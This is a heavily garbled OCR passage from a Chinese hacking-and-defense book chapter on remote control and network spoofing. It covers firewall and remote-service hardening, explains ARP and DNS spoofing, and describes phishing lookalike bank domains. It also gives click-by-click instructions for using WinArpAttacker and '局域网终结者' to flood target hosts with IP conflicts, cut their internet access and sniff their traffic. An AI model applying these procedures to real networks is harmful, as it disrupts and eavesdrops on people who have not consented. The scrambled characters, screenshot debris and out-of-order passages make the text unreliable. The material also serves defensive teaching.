后 ， 就 可 以 对 被 控 端 计算 机 进行 远程 监控 、 
主 控 端 管理 、 文 件 传送 等 操作 ， 从 而 实现 
控制 远程 计算 机 的 目的 ， 如 下 图 所 示 。 


[see 图 在 “会 话 管理 器 ”任务 栏 中 选择 “ 文 
件 传 送 ” 选 项 ， 即 可 在 被 控 端 与 主 控 端 计 
算 机 之 间 进 行文 件 传送 ， 如 下 图 所 示 。 


ET 


[step 国 选择 “显示 聊天 ”选项 ， 则 可 以 像 在 
a 样 进行 实时 聊天 ， 如 下 图 所 示 。 


癌 snoneepamrier MF 
| MNCSTONOS 
[animey 全 


| 


Buy Ea #0 | xm 


6.3 ”防范 远程 控制 的 方法 与 技巧 
要 想 使 自己 的 计算 机 不 受 远程 控制 入 
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侵 的 困扰 ， 就 需要 用 户 对 自己 的 计算 机 进 
行 相应 的 保护 操作 ， 如 开启 系统 防火 墙 或 
安装 相应 的 防火 墙 工具 等 。 


绝招 6: 开启 系统 自 带 Windows 防 火 墙 


为 了 更 好 进行 网 络 安全 管理 ，Windows 
系统 特意 为 用 户 提 供 了 防火 墙 功能 。 如 果 
能 够 巧妙 地 使 用 该 功能 ， 就 可 以 根据 实际 
需要 人 允许 或 拒绝 网 络 信息 通过 ， 从 而 达到 
防范 攻击 、 保 护 系 统 安全 的 目的 。 

使 用 Windows 自 带 防火 墙 的 具体 操作 

步骤 如 下 。 
[Sep 加 在 “控制 面板 ”窗口 中 双击 “Windows 
pe 打开 “Windows 防 火 墙 ”窗口 ， 
在 窗口 中 显示 此 时 Windows 防火 墙 已 经 被 
开启 ， 如 下 图 所 示 。 


Windows mx 


火 时 六 辽 肥 保护 人 的 电 议 


[step 图 单 击 “ 人 允许 应 用 或 功能 通过 Windows 
防火 墙 ”链接 ， 在 打开 的 窗口 中 可 以 设置 
允许 哪些 应 用 或 功能 通过 Windows 防火 墙 
访问 外 网 ， 如 下 图 所 示 。 


FFTTTTTTE 


step 国 单 击 “ 更 改 设置 ”或 “启用 或 关闭 
Windows 防火 墙 ” 链 接 ， 在 打开 的 窗口 中 
可 以 开启 或 关闭 防火 墙 ， 如 下 图 所 示 。 


办 a 


EE 
Om Wiow marem 
Sm 
四 am wriow ms 
门人 和 二 有 和 
加 Windows pkMIELL# 
EB Om Wniow Eran 


[em 
step 较 单 击 “高 级 设置 ”链接 ， 进 入 “高 级 
设置 ”窗口 ， 在 其 中 可 以 对 入 站 、 出 站 、 
连接 安全 等 规则 进行 设 定 ， 如 下 图 所 示 。 


. 关闭 Windows 远程 桌面 功能 是 防止 黑 
客 远程 入 侵 系统 的 首要 工作 ， 具 体 的 操作 
步骤 如 下 。 

EO 右 去 桌面 上 的 “计算 机 ”图 标 ， 在 弹 
出 的 快捷 菜单 中 选择 “属性 ”菜单 命令 ， 

打开 “系统 属性 ”对 话 框 ， 如 下 图 所 示 。 


第 6 章 “”Windows 系 统 远程 控制 与 网 络 欺骗 Se 


FR) 


一个 运 项 然后 检定 和 可 以 连接 
CO 不 和 话 二 本 二 了 8 二 真 WUD) 
@ NE 
ech 
" 


Baa RE). 


应 有 A) 


[step 图 取消 选中 的 “允许 远程 协助 连接 这 台 
计算 机 ” 复 选 框 ， 选 中 “不 允许 远程 连接 
到 此 计算 机 ” 单 选 按钮 ， 然 后 单 击 “ 确 定 ” 
按钮 ， 即 可 关闭 Windows 系统 的 远程 桌面 
功能 ， 如 下 图 所 示 。 
Ee 
计算 机 名 硬件 。 高 级 。 系统 保护 远程 

运程 协 妈 

口 光 许 远程 协助 连接 这 台 计算 机 (R) 

有 关 记 后 法 和夫 各 的 信息 


高 织 V) 


远 本 点 本 
远 尖 一 个 选项 ,然后 插 定 人 可 以 连接 , 
加 不 允许 运 本 这 接 到 此 计算 tn(D) 


〇 允许 远程 连 近 到 tt 计算 机 


上 证 的 远 得 点 面 的 计算 机 连接 ( 健 议 ) 
选择 用 户 (S).。 


Eww 


应 用 (A) 


绝招 8: 关闭 远程 注册 表 管 理 服务 


远程 控制 注册 表 主 要 是 为 了 方便 网 络 
管理 员 对 网 络 中 的 计算 机 进行 管理 ， 但 这 
样 却 给 黑客 入 侵 提 供 了 方便 。 因 此 ， 必 须 
关闭 远程 注册 表 管 理 服务 ， 具 体 的 操作 步 
又 如 下 。 
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step 国 在 “控制 面板 ”窗口 中 双击 “管理 工具 ” 
选项 ,进入 “管理 工具 ”窗口 ， 如 下 图 所 示 。 


[ERs 国 双击 “服务 ”选项 , 打开 “服务 ”窗口 ， 
在 其 中 可 看 到 本 地 计算 机 中 的 所 有 服务 ， 
如 下 图 所 示 。 


rm/Es] 


lstep 图 在 “服务 ”列表 中 选中 Remote 
Registry 选项 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “属性 ”菜单 命令 ， 打 开 “Remote 
Registry 的 属性 (本 地 计算 机 )” 对 话 框 ， 
如 下 图 所 示 。 


emore Regiery fo tit 


Sm BR Kk Gog 
ss 
ES 


ms 


Nz 
Cw 
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step 园 单 击 “停止 ”按钮 ， 即 可 打开 “服务 
控制 ”对 话 框 ， 提 示 Windows 正在 尝试 启 
动 本 地 计算 上 的 一 些 服务 ， 如 下 图 所 示 。 


最 务 控制 x 


Windows 正在 汰 添 停 止 本 地 计算 机 上 的 下 列 服务 


Remote Registry 


国 


在 服务 启动 完毕 之 后 ， 即 可 返回 到 
“Remote Registry 的 属性 (本 地 计算 机 )” 
对 话 框 ， 此 时 即 可 看 到 “服务 状态 ”已 变 
为 “已 停止 "， 单 击 “确定 ”按钮 ， 即 可 关 
闭 远 程 注册 表 管 理 服务 ， 如 下 图 所 示 。 


Remote Registry 的 属性 本 地 计算 机 ) x 


军 规 。 登录 。 恢复 。 依存 关 系 


ss 让 

全称 Remote Registry 

丘 述 使 天 全 用 广 能 修改 此 计算 机 上 的 注册 训 设 置 ， 如 果 此 服 和 
务 所 终止 ， 只 有 比 计算 作 上 的 用 户 才 衣 修 改 注册 认 , 如 、 

司 册 行文 中 的 路 尼 ， 

CAWINDOWS\system32\svchost.exe -klocalService 

BE): 要 有 

服务 状 万 Bm 

as) Em 暂停 P) Ey 


从 此 处 客 动 服务 于， 你 可 描 定 所 适用 的 启 四 参数 


应 用 内 


6.4 ”形形色色 的 网 络 欺骗 攻击 


一 个 黑客 在 真正 入 侵 系 统 时 ， 并 不 
是 依靠 别人 写 的 什么 软件 ， 更 多 是 靠 对 系 
统 和 网 络 的 深入 了 解 来 达到 目的 ， 从 而 出 
现 了 形形色色 的 网 络 欺 骗 攻 击 ， 如 常见 的 
ARP 欺骗 、DNS 欺骗 、 钓 鱼网 站 欺骗 术 等 。 


绝招 9: 网 络 中 的 ARP 欺 骗 攻 击 


ARP 欺 骗 是 黑客 常用 的 攻击 手段 之 一 ， 剖 党 直 


ARP 欺骗 分 为 两 种 ， 一 种 是 对 路 由 器 ARP 
表 的 欺骗 ， 另 一 种 是 对 内 网 PC 的 网 关 欺 骗 ， 
ARP 欺骗 容易 造成 客户 端 断 网 。 


1. ARP 欺 骗 的 工作 原理 


假设 一 个 网 络 环境 中 , 网 内 有 3 台 主 机 ， 
分 别 为 主机 A、B、C。 主机 详细 信息 如 下 。 

A 的 地 址 为 : IP:192.168.0.1 MAC: 00- 
00-00-00-00-00。 

B 的 地 址 为 : IP:192.168.0.2 MAC: 11- 
jls 

C 的 地 址 为 : IP:192.168.0.3 MAC: 22- 
22-22-22-22-22。 

正常 情况 下 是 A 和 C 之 间 进 行 通 信 ， 
但 此 时 B 向 A 发送 一 个 自己 伪造 的 ARP 应 
答 ， 而 这 个 应 答 中 的 数据 为 发 送 方 人 P 地 址 
192.168.0.3(C 的 人 地址 )，MAC 地 址 是 
11-11-11-11-11-11 (C 的 MAC 地 址 本 来 应 
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象 (无 法 ping 通 网 关 )， 重 启 计 算 机 或 在 
MS-DOS 窗口 下 运行 命令 arp -d 后 ， 又 可 恢 
复 上 网 。 

ARP 欺骗 木马 只 需 成 功 感染 一 台 计 算 
机 ， 就 可 能 导致 整个 局 域 网 都 无 法 上 网 ， 
严重 的 甚至 可 能 带 来 整个 网 络 的 瘫痪 。 


3. 开始 进行 ARP 欺 骗 攻 击 


使 用 WinArmpAttacker 工具 可 以 对 网 络 
进行 ARP 欺骗 攻击 ， 除 此 之 外 ， 利 用 该 工 
具 还 可 以 实现 对 ARP 机 器 列表 的 扫描 。 

具体 的 操作 步骤 如 下 。 

[se 加 下 载 WinArpAttacker 软件 ， 双 击 其 
中 的 WinArpAttackerexe 程序 ， 即 可 打开 
WinArpAttacker 主 窗 口 ， 如 下 图 所 示 。 


WD Uned - winarphmaceer 370 二 了 各 


六 3 2z 性 则 册 要 关口 大 


中 户 央 涡 - 束 -区 党 徊 魏 同 昭和 镶 瞻 


ae i i i 


该 是 22-22-22-22-22-22， 这 里 被 伪造 了 ) 。 


当 A 接收 到 B 伪造 的 ARP 应 答 ， 就 会 更 新 
本 地 的 ARP 缓存 (A 被 欺骗 了 ) ， 这 时 了 B 
就 伪装 成 C 了 。 


同时 ，B 同样 向 C 发 送 一 个 ARP 应 答 ， 
应 答 包 中 发 送 方 全 地 址 是 192.168.0.1 (A 
的 下 地 址 )，MAC 地 址 是 11-11-11-11-11- 
11 (A 的 MAC 地 址 本 来 应 该 是 00-00-00- 
00-00-00)， 当 C 收 到 B 伪造 的 ARP 应 答 ， 
也 会 更 新 本 地 ARP 缓存 〈C 也 被 欺骗 了 )， 
这 时 B 就 伪装 成 了 A。 这 样 主机 A 和 C 都 
被 主机 B 欺骗 ,A 和 C 之 间 通 信 的 数据 都 
经 过 了 B。 主 机 B 完全 可 以 知道 它们 之 间 
说 的 什么 。 这 就 是 典型 的 ARP 欺骗 过 程 。 


2. 遭受 ARP 攻 击 后 现象 


ARP 欺骗 木马 的 中 毒 现象 表现 为 :使 
网 络 中 的 计算 机 突然 掉 线 ， 过 一 段 时 间 后 
又 会 恢复 正常 。 例 如 用 户 频繁 断 网 、 正 浏 
览 器 频繁 出 错 ， 以 及 一 些 常 用 软件 出 现 故 
障 等 。 如 果 局 域 网 中 是 通过 身份 认证 上 网 
的 ， 会 突然 出 现 可 认证 ， 但 不 能 上 网 的 现 


Time | Evert ActHest | EfiectH | IP | Mac 


19216801 。 F4-83-CD-3| 


19216802 00-00-00-0 
19216803 00-00-00.0 
19216804 00-00-00-0v 


ned T5413 — WAAR er 370 Suld 008 3 0h 
aneng 15 11-34] Th progrom © tras wors, ae yo can vee and redaybuie tree 
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[step 图 选择 “扫描 ”一 “高 级 ”选项 ， 即 可 
打开 “扫描 ”对 话 框 ， 从 中 可 以 看 出 有 扫 
描 主 机 、 扫 描 网 段 、 多 网 段 扫描 3 种 扫描 
方式 ， 如 下 图 所 示 。 


ES 


厂 &m 抽 


EE .| 


step 国 使 用 “扫描 主机 ”方式 可 以 获得 目 
标 主机 的 MAC 地 址 。 在 “扫描 ”对 话 框 
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SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


中 选中 “扫描 主机 ” 单 选 按钮 ， 并 在 后 面 
的 文本 框 中 输入 目标 主机 的 四 地 址 ， 如 
192.168.0.104， 然 后 单 击 “ 扫 描 ” 按 钮 ， 即 
可 获得 该 主机 的 MAC 地址 ， 如 下 图 所 示 。 


EE x 


民 正常 扫 握 


[sep 加 “扫描 网 段 ” 方式 可 以 对 指定 卫 段 
范围 内 的 主机 进行 扫描 。 选 中 “扫描 网 段 ” 
单 选 按钮 ， 在 人 P 地 址 范围 的 文本 框 中 输入 
扫描 的 JP 地址 范围 ， 如 下 图 所 示 。 


扫描 x 
高 织 扫 描 
扫描 主 机 1 1 0 104 -EEC-AD-135-7 
6 扫 摘 同 段 192 168 .0 .1 [is .168 .0 .254 
个 多 网 段 扫 据 
Subnet [IP Netnask 
Do 192.168.0.104 255. 255. 255.0 
忆 正常 扫描 厂 反 监听 扫 扬 
-至 消 | 


单 击 “扫描 ”按钮 即 可 进行 扫描 操 
作 ， 当 扫描 完成 时 会 出 现 一 个 “Scanning 
successfully ! ”( 扫 描 成 功 ) 对 话 框 ， 如 下 
图 所 示 。 


WinArpAttacker x 


Fr" Scanning successfully ! 


step 园 依次 单 击 “确定 ”按钮 ， 返回 到 
WinArpAttacker 主 窗口 ， 在 其 中 即 可 看 到 要 
描 结 果 ， 如 下 图 所 示 。 
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此 时 ，WinArpAttacker 窗口 被 分 成 以 
下 3 个 部 分 。 

e 上 面 的 区 域 是 主机 列表 区 ， 主 要 显 
示 局 域 网 内 的 机 器 全、MAC、 主 机 
名 、 是 否 在 线 、 是 否 在 监听 、 是 否 
处 于 被 攻击 状态 ， 以 及 ARP 数据 包 
和 转发 数据 包 统计 信息 等 ; 

。 左下 方 的 区 域 是 检测 事件 显示 区 ， 
主要 显示 检测 到 的 主机 状态 变化 和 
攻击 事件 ; 

e 右 下 方 的 区 域 显示 全 地 址 和 MAC 
地 址 信息 。 

[step 国 在 扫描 结果 中 选中 要 攻击 的 目标 计算 
机 前 面 的 复 选 框 ， 然 后 在 WinArpAttacker 
主 窗口 中 单 击 “ 攻 击 ” 下 拉 按 钮 ， 在 其 弹 
出 的 快捷 菜单 中 选择 任意 选项 ， 就 可 以 对 
其 他 计算 机 进行 攻击 了 ， 如 下 图 所 示 。 


WD Unied -wowphackw a70 HB 才 


Cr 
和 


7 ?7 


在 WinArpAttacker 中 有 以 下 6 种 攻击 
方式 。 
e 不 断 他 冲突 击 : 不 间断 的 也 冲突 


攻击 ，FLOOD 攻击 默认 是 1000 
次 ， 可 以 在 选项 中 改变 这 个 数值 。 
FLOOD 攻击 可 使 对 方 机 器 弹出 他 
冲突 对 话 框 ， 导 致死 机 。 
e 禁止 上 网 : 可 使 对 方 机 器 不 能 上 网 ; 
e 定时 IP 冲突 ; 定时 的 卫 冲突 ; 
e 监听 网 关 通 信 : 监听 选 定 机 器 与 网 
关 的 通信 ， 监 听 对 方 机 器 的 上 网 流 
量 。 发 动 攻击 后 用 抓 包 软件 来 抓 包 
看 内 容 ; 
e 监听 主机 通信 : 监听 选 定 的 几 台 机 
器 之 间 的 通信 ; 
e 监听 网 络 通信 : 监听 整个 网 络 任意 
机 器 之 间 的 通信 ， 这 个 功能 过 于 危 
险 ， 可 能 会 把 整个 网 络 搞 乱 ， 建 议 
不 要 乱用 。 
[Step 图 如 果 选 择 “IP 冲突 ”选项 ， 即 可 使 目 
标 计算 机 不 断 弹出 “IP 地 址 与 网 络 上 的 其 
他 系统 有 冲突 ”提示 框 ， 如 下 图 所 示 。 


局 Tindors - 系统 错误 x 
IP 地 址 与 网 络 上 的 其 地 系统 有 冲突 。 


[step 国 如 果 选 择 “禁止 上 网 ”选项 ， 此 时 在 
WinArpAttacker 主 窗 口 就 可 以 看 到 该 主机 的 
“攻击 ”属性 变 为 BanGateway， 如 下 图 所 示 。 
如 果 想 停止 攻击 ， 则 需 在 WinArpAttacker 
主 窗 口 选择 “攻击 ”一 “停止 攻击 ”选项 
即 可 停止 攻击 ， 否 则 将 会 一 直 攻 击 下 去 。 
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step 辆 在 WinArmpAttacker 主 窗口 中 单 击 “发 
送 ” 按 钮 ， 即 可 打开 “手动 发 送 ARP 包 ” 
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对 话 框 ， 在 其 中 设置 目标 硬件 Mac、ARP 
方向 、 源 硬件 Mac、 目 标 协议 Mac、 源 协 
议 Mac、 目标 全 和 源 全 等 属性 , 单 击 “ 发 送 ” 
按钮 ， 即 可 向 指定 的 主机 发 送 ARP 数据 包 。 


EE Rt 


2 ees 


re 
| 


EE | 


[sep 贺 在 WinArpAttacker 主 窗口 中 选择 “ 设 
置 ” 选 项 ， 然 后 在 弹出 的 快捷 菜单 中 选择 
任意 一 项 ， 即 可 打开 “Options (选项 )” 对 
话 框 ， 在 其 中 对 各 个 选项 卡 进行 设置 ， 如 
下 图 所 示 。 


Options x 


适 本 加 | 区 过 ”| 更 新 | 堆 测 | 力 析 | ARP 人 理 | 保护 | 


本 可 
Es FE -| 
ES [PheesU Goab Ethernet 107100/1000 
Pp e216a0104 | 
Fm F52552550 | 
NMAC Ec A013 
网 天 lp 19216801 本 
网 天 MAC Fea3-C0-33-60.73 
DNS EETYE 

EEE 


到 家 |\Device\NPF (82CAC205-4844-4802-6E93-EC6F2660D70F) 


出 新 
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绝招 10: 网 络 中 的 DNS 欺骗 攻击 


DNS 欺骗 即 域名 信息 欺骗 ， 是 最 常见 
的 DNS 安全 问题 。 当 一 个 DNS 服务 器 掉 
入 陷阱 ， 使 用 了 来 自 一 个 恶意 DNS 服务 器 
的 错误 信息 ， 那 么 该 DNS 服务 器 就 被 欺骗 
了 。 在 Windows 10 系统 中 , 用 户 可 以 在 “ 命 
令 提 示 符 ”窗口 中 输入 nslookup 命令 来 查 
询 DNS 服务 器 的 相关 信息 ， 如 下 图 所 示 。 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


丽 管理 员 : CNwindows\system32wcmdexe-- 一 口 Xx 


icrosoft Windows [版 本 10. 0. 16299. 936] 
(c) 2017 Microsoft Corporation。 保 留 所 有 权利 。 


卫浴 tr elonkup 
Address: 61.128.114.166 
> 


1. DNS 欺 骗 原 理 


如 果 可 以 冒充 域名 服务 器 ， 再 把 查询 
的 他 地 址 设置 为 攻击 者 的 他 地 址 ， 用 户 上 
就 只 能 看 到 攻击 者 的 主页 ， 而 不 是 用 户 
想 去 的 网 站 的 主页 ， 这 就 是 DNS 欺骗 的 基 
本 原理 。DNS 欺骗 并 不 是 要 黑 掉 对 方 的 网 
站 ， 而 是 冒名 顶替 ， 从 而 实现 其 欺骗 目的 。 
和 IP 欺骗 相似 ，DNS 欺骗 的 技术 在 实现 上 
仍然 有 一 定 的 困难 ， 为 克服 这 些 困难 ， 有 
必要 了 解 DNS 查询 包 的 结构 。 

在 DNS 查询 包 中 有 个 标识 卫 ， 其 作用 
是 鉴别 每 个 DNS 数据 包 的 印记 ， 从 客户 端 
设置 ， 由 服务 器 返回 ， 使 用 户 匹 配 请 求 与 
响应 。 如 某 用 户 在 正 浏览 器 地 址 栏 中 输入 
www.baidu.com， 如 果 黑 客 想 通过 假 的 域名 
服务 器 (如 220.181.6.20) 进行 欺骗 ， 就 要 
在 真正 的 域名 服务 器 (220.181.6.18) 返回 
响应 前 , 先 给 出 查询 的 外 地 址 , 如 下 图 所 示 。 


WE iE 
用 PF 


黑客 


上 图 很 直观 ， 就 是 真正 在 域名 服务 器 
220.181.6.18 前 ， 黑 客 给 用 户 发 送 一 个 伪造 
的 DNS 信息 包 。 但 在 DNS 查询 包 中 有 一 
个 重要 的 域 就 是 标识 ID， 如 果 要 发 送 伪造 
的 DNS 信息 包 不 被 识破 ， 就 必须 伪造 出 正 
确 的 ID。 如 果 无 法 判别 该 标记 ，DNS 欺骗 
将 无 法 进行 。 只 要 在 局 域 网 上 安装 有 嗅 探 
器 ， 通 过 嗅 探 器 就 可 以 知道 用 户 的 ID。 但 
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要 是 在 Intemet 上 实现 欺骗 ， 就 只 有 发 送 大 
量 一 定 范围 的 DNS 信息 包 ， ca 
确 ID 的 机 会 。 


2. DNS 欺骗 的 方法 


网 络 攻 击 者 通常 通过 以 下 3 种 方法 进 
行 DNS 欺骗 。 

1) 缓存 感染 

黑客 会 熟练 地 使 用 DNS 请 求 ， 将 数据 
放 入 一 个 没有 设防 的 DNS 服务 器 的 缓存 中 。 
这 些 缓存 信息 会 在 客户 进行 DNS 访问 时 返 
回 给 客户 ， 从 而 将 客户 引导 到 入 侵 者 所 设置 
的 运行 木马 的 Web 服 务 器 或 邮件 服务 器 上 ， 
然后 黑客 从 这 些 服务 器 上 获取 用 户 信息 。 

2) DNS 信息 支持 

入 侵 者 通过 监听 客户 端 和 DNS 服务 器 
的 对 话 ， 通 过 猜测 服务 器 响应 给 客户 端的 
DNS 查询 ID。 每 个 DNS 报 文 包括 一 个 相 
关联 的 16 位 ID 号 ，DNS 服务 器 根据 这 个 
ID 号 获取 请 求 源 位 置 。 黑 客 在 DNS 服务 器 
之 前 将 虚假 的 响应 交 给 用 户 ， 从 而 欺骗 客 
户 端 去 访问 恶意 的 网 站 。 

3) DNS 重 定向 

攻击 者 能 够 将 DNS 名 称 查询 重 定向 
到 恶意 DNS 服务 器 。 这 样 攻 击 者 可 以 获得 
DNS 服务 器 的 写 权 限 。 

防范 DNS 欺骗 攻击 可 采取 以 下 两 种 
措施 : 

(1) 直接 用 下 访问 重要 的 服务 ， 这 样 

至 少 可 以 避 开 DNS 欺骗 攻击 。 但 这 需要 记 

住 要 访问 的 下 地址。 

(2) 加 密 所 有 对 外 的 数据 流 ， 对 服务 
器 来 说 就 是 尽量 使 用 SSH 之 类 的 有 加 密 支 
持 的 协议 ， 对 一 般 用 户 应 该 用 PGP 之 类 的 
软件 加 密 所 有 发 到 网 络 上 的 数据 。 这 并 不 
是 多 么 容易 的 事情 。 


绝招 11: 局 域 网 中 的 主机 欺骗 


局 域 网 终结 者 是 用 于 攻击 局 域 网 中 计 和 


算 机 的 一 款 软 件 ， 其 作用 是 构造 虚假 ARP 


数据 包 欺 骗 网 络 主机 ， 使 目标 主机 与 网 络 
断 开 。 

使 用 局 域 网 终结 者 欺骗 网 络 主机 的 具 
体操 作 步 又 如 下 。 
[step 图 在 “命令 提示 符 ” 窗 口中 输入 ipconfig 
命令 , 按 Enter 键 , 即 可 查看 本 机 的 IP 地 址 ， 
如 下 图 所 示 。 


| BB sa: chwindovevoyremazwmd ere = BD % 


线 局 域 网 适配器 LAN: 


ST 


42b :2b69:1c18:f11e%2 
二 Rs 192. oie, 
Oe 
以 太 网 适配器 蓝牙 网 络 连 接 : 
wis 


隧道 适配器 本 地 连接 + 13; 


连接 特定 的 DNS 后 级 .. . . . . . : 
IPv6 地 址 ，........... :2001:0:9d38:6ab8:14fb:1720:21 
:910 


[step 图 在 “命令 提示 符 ” 窗 口中 输入 ping 
192.168.0.135 -t 命令 ， 按 Enter 键 ， 即 可 检 
测 本 机 与 目标 主机 之 间 是 否 连通 。 如 果 出 
现 相应 的 数据 信息 ， 则 表示 可 以 对 该 主机 
进行 ARP 欺骗 攻击 ， 如 下 图 所 示 。 


丽 管理 员 : C\windows\system32\emd.exe - ping 1.. 一 口 x 
:\Users\Administrator>ping 192. 168. 0. 135 -t ~ 
在 Ping 192. 168.0, 135 具有 32 字 节 | 

际 192. 168. 0. 135 印 : 53 时 间 

厌 自 192. 168. 0. 135 的 回复 : 字 节 =32 上 

了 康 自 192. 168. 0, 135 的 回复 : 字 节 =32 

3 目 192. 168. 0. 135 的 回 : =32 时 

了 康 自 192. 168. 0. 135 的 回复 : 字 节 =32 四 

于 四 12 1 中 1 多 四 复 : 字 沁 -32 外 

[= 0. 1. 和 二 

际 自 192. 168. 0, 135 的 回复 : =32 时 

卫 自 192. 168. 0. 135 的 回复 : 都 字 

卫 自 192. 168. 0. 135 的 回复 : =32 时 

康 自 192. 168. 0. 135 的 回 ; 医 之 

奈 自 192. 168. 0. 135 的 回复 : 字 节 =32 时 间 <lms TTL=128 

了 庶 自 192. 168. 0. 135 的 回复 : Ee 时 


[step 图 如 果 出 现 “ 请 求 超时 ”提示 信息 ， 如 
下 图 所 示 ， 则 说 明 对 方 已 经 启用 防火 墙 ， 

此 时 就 无 法 对 主机 进行 ARP 欺骗 攻击 。 
丽 管理 员 : CNwindows\system32wmdexe -. 一 口 Xx 


JGcrosoft Windows [版 本 10. 0. 16299. 936] 
(c) 2017 Microsoft Corporation。 保 留 所 有 权利 。 


FE:NUsersNAdministratoryping 192. 168. 0.108 -t 
正在 Ping 192. 168. 0. 108 具有 32 字 节 的 数据 : 
青 求 超时 。 
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step 园 运行 “局 域 网 终结 者 ” 主 程序 后 ， 打 
开 “ 局 域 网 终结 者 ” 主 窗 口 ， 如 下 图 所 示 。 


吉 局 域 网 终结 者 一 x 
本 边 网 络 信息 : 192.168.0.104 1/ 255.255.255.0 
目标 PP: | 192 ,168 ，0 ，0 ”| | 添加 到 阻 断 列表 
警告: 添加 到 列表 中 的 主机 将 无 法 使 用 TCP/IP 协 议 。 
正在 被 阻 断 的 P 地 址 列表 : 
取消 选中 地 址 
ME 
Ds CH] 
声明 : 


在 人 中 这 Wt89 一 切 打 
: ”waterdoud 2002/09/25 


[Estee 图 在 “目标 IP” 文 本 框 中 输入 要 控制 目 
标 主机 的 IP 地址， 然后 单 击 “ 添 加 到 阻 断 
列表 ”按钮 ， 即 可 将 该 耳 地 址 添加 到 “ 阻 
断 ” 列 表 中 ， 如 下 图 所 示 。 如 果 此 时 目标 
主机 中 出 现 全 冲突 的 提示 信息 ， 则 表示 攻 
击 成 功 。 
RX 
本 地 网 络 信息 19. 68,0,104 /1255,255,255,0 
目标 P: [ 192 . 166 ，0 .108 | [于 阳新 列 家 | 


警告 : 添加 到 列表 中 的 主机 将 无 法 使 用 TCP/IP 协 议 。 


正在 被 阴 断 和 IP 地址 列表 : 

] 192.168.0.108 取消 选中 地 址 
关于 
退出 


声明 : 
ee 


绝招 12: 钓鱼 网 站 的 欺骗 技术 
钓鱼 网 站 通常 指 伪装 成 银行 网 站 及 电 


子 商务 网 站 ， 窃 取 用 户 提交 的 银行 账号 、 


密码 等 私密 信息 的 网 站 。“ 钓 鱼 ” 是 一 种 
网 络 欺诈 行为 ， 指 不 法 分 子 利用 各 种 手段 ， 
仿冒 真实 网 站 的 URL 地 址 以 及 页 面 内 容 ， 
或 利用 真实 网 站 服务 器 程序 上 的 漏洞 在 站 
点 的 某 些 网 页 中 插入 危险 的 HIML 代码 ， 
以 此 来 骗取 用 户 银行 或 信用 卡 账号 、 密 码 
等 私人 资料 。 

网 络 钓鱼 的 技术 手段 有 多 种 ， 如 邮件 
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攻击 、 跨 站 脚本 、 网 站 克隆 、 会 话 截取 等 ， 
但 在 各 种 网 银 事件 中 ， 最 常见 的 是 克隆 网 
站 和 URL 地 址 欺骗 这 两 种 手段 ， 下 面 分 别 
进行 分 析 。 


1. 克隆 网 站 


“克隆 网 站 ”( 也 称 “伪造 网 站 ”) 其 攻 
击 形式 被 称 作 域 名 欺骗 攻击 ， 即 网 站 的 内 
容 和 真实 的 银行 网 站 非常 的 相似 ， 而 且 非 
常 简单 ， 最 致命 的 一 点 是 通过 网 站 克隆 技 
术 克 隆 的 网 站 和 真实 的 网 站 真 假 很 难 辨别 
有 时 只 是 在 网 站 域名 中 有 一 些 极 细小 的 差 
别 ， 不 细心 的 用 户 就 很 容易 上 当 。 

进行 网 站 克隆 首先 需要 对 网 站 的 域名 
地 址 进行 伪装 欺骗 ， 最 常用 的 就 是 采用 和 
真实 银行 的 网 址 非常 相似 的 域名 地 址 ， 如 
虚假 的 农业 银行 域名 地 址 为 www.95569.cn 
和 真实 的 网 址 www.95599.cn 只 有 一 个 “6” 
字 只 差 ， 不 细心 的 用 户 很 难 发 现 。 如 下 图 
所 示 即 为 真实 农业 银行 与 虚假 农业 银行 的 
对 比 图 。 


@ http://www.95599.cn/en/default htm 
。 文件 (F) ”编辑 (E) ”前 看 (V) 收藏 夫 (A) ”工具 (T) 者 助 (H) 


图 http://vwww.95569.cn/cn/default.htm 
;文件 ( 编辑 (E) ”前 看 (V) 收藏 夫 (A) 工具 (T) ”帮助 (H) 


另外 ， 在 其 他 银行 中 类 似 的 情况 也 出 
现 不 少 ， 如 在 2004 年 出 现 的 中 国 工商 银行 
假冒 的 网 站 使 很 多 用 户 上 当 受 骗 ， 其 假冒 
的 网 站 域名 为 www.lcbc.com.cn， 这 与 真实 
的 网 址 www.icbc.com.cn 只 有 数字 “1” 和 
字母 i 的 不 同 ， 如 下 图 所 示 。 还 有 一 些 假冒 
的 工商 银行 的 网 站 地 址 www:icbc.com 只 比 
真实 的 网 址 缺少 cn 两 个 字母 ， 不 细心 的 用 
户 根本 不 容易 发 现 。 
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€] httpV/wwwlcbccom.cmicbc/ 
文件 (月 ”编辑 (E) 。 坦 看 (V) 收藏 夫 (A) 工具 (T) 帮助 (H) 


Bhttp:/ /wicbc.com.cn/icbe/ 
文件 ” 编 志 (和 可 看 V) ， 收 项 夫 (A) 工具 (T) 帮助 (H) 


总 之 ,网 站 克隆 攻击 很 难 被 用 户 发 现 ， 
一 不 小 心 就 很 容易 上 当 受 骗 。 除 此 之 外 
现在 网 站 的 域名 管理 也 不 是 很 严格 ， 普 通 
用 户 也 可 以 申请 注册 域名 ， 使 得 网 站 域名 
欺骗 展 屡 发 生 ， 给 网 银 用 户 带 来 了 极 大 的 
经 济 损失 。 但是, 假 的 真 不 了 , 真 的 假 不 了 
即使 伪造 的 网 站 页 面 的 LOGO、 图 标 、 新 
闻 和 超级 链接 等 内 容 都 能 连接 到 真实 的 网 
页 ， 但 在 输入 账号 的 位 置 处 就 会 存在 着 与 
真实 网 站 的 不 同 之 处 ， 这 是 网 站 克隆 攻击 
是 否 成 功 的 关键 所 在 。 当 用 户 输入 自己 的 
账号 和 密码 时 ， 网 站 会 自动 弹出 一 些 不 正 
常 的 窗口 ， 如 提示 用 户 输入 的 账号 或 密码 
不 正确 ， 要 求 再 次 输入 账号 和 密码 的 信息 
窗口 等 。 其 实 ， 在 用 户 第 一 次 输入 账号 和 
密码 并 提示 输入 错误 时 ， 该 账号 信息 已 经 
被 网 站 后 门 程序 记录 下 来 并 发 送 到 黑客 手 
中 了 。 


ICBC( 国 中 国 工商 银行 金融 @G@ 家 - 


~b 


1 和 和 Webmssier@icbe com on 中 国耻 


DL 
DLE 


EP 和 ， 汪 5 宙 注 关 且 放 和。 


2. URL 地 址 欺骗 攻击 


URL 其 全 称 为 Uniform Resource Loca- 
tors， 即 统一 资源 定位 器 的 意思 ， 在 地 址 
栏 中 输入 的 网 址 就 属于 URL 的 一 种 表达 方 
式 。 基 本 上 所 有 访问 网 站 的 用 户 都 会 使 用 
